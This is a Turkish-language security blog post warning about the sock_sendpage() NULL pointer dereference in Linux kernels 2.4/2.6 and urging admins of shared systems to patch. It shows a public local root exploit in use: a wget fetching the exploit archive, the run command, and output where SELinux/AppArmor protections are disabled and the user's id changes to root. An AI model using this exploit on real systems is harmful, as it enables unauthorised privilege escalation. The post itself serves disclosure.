Time To Patch Linux Kernel

Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(Linux Kernel ‘sock_sendpage()’ NULL Pointer Dereference Vulnerability). Ozellikle paylasimli sistem kullanip shell hesabi verenlerin acilen güncellemesini öneriyorum.

Aciklikla ilgili çalışan exploitler ve yamalar çıkmış durumda.

Açıklık kullanılarak tek bir komutla siradan bir user root haklarini elde edebiliyor. Klasik exploitlerden farklı olarak exploit yazari derleme vs islemleriyle ugrasilmasin diye bir bash scripti hazirlamis:). Tak calistir mahiyetinde.

Exploit kullanmadan onceki kullanici haklari.
$ id
uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe)

Exploitin kullanimi

# wget http://www.grsecurity.net/~spender/exploitx.tgz
[email protected]:/tmp$ cd exploitx
[email protected]:/tmp/exploitx$ ls
exploit.c  pwnkernel.c  tzameti.avi  wunderbar_emporium.sh
[email protected]:/tmp/wunderbar_emporium$ ./exploitx.sh
[+] Personality set to: PER_SVR4
E: x11wrap.c: XOpenDisplay() failed
E: module.c: Failed to load  module “module-x11-publish” (argument: “”): initialization failed.
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc05b4b7c
[+] Resolved selinux_enabled to 0xc05b4b78
[+] Resolved apparmor_enabled to 0xc04798a4
[+] Resolved apparmor_complain to 0xc05b6770
[+] Resolved apparmor_audit to 0xc05b6778
[+] Resolved apparmor_logsyscall to 0xc05b677c
[+] Resolved security_ops to 0xc05b3324
[+] Resolved default_security_ops to 0xc0478640
[+] Resolved sel_read_enforce to 0xc021fa60
[+] Resolved audit_enabled to 0xc0574544
[+] got ring0!
[+] detected 2.6 style 8k stacks
[+] Disabled security of : LSM
[+] Got root!
#
# id
uid=0(root) gid=0(root) groups=1001(huzeyfe)

Detaylar icin : http://www.securityfocus.com/bid/36038/info

This entry was posted in Linux Security. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

4 × five =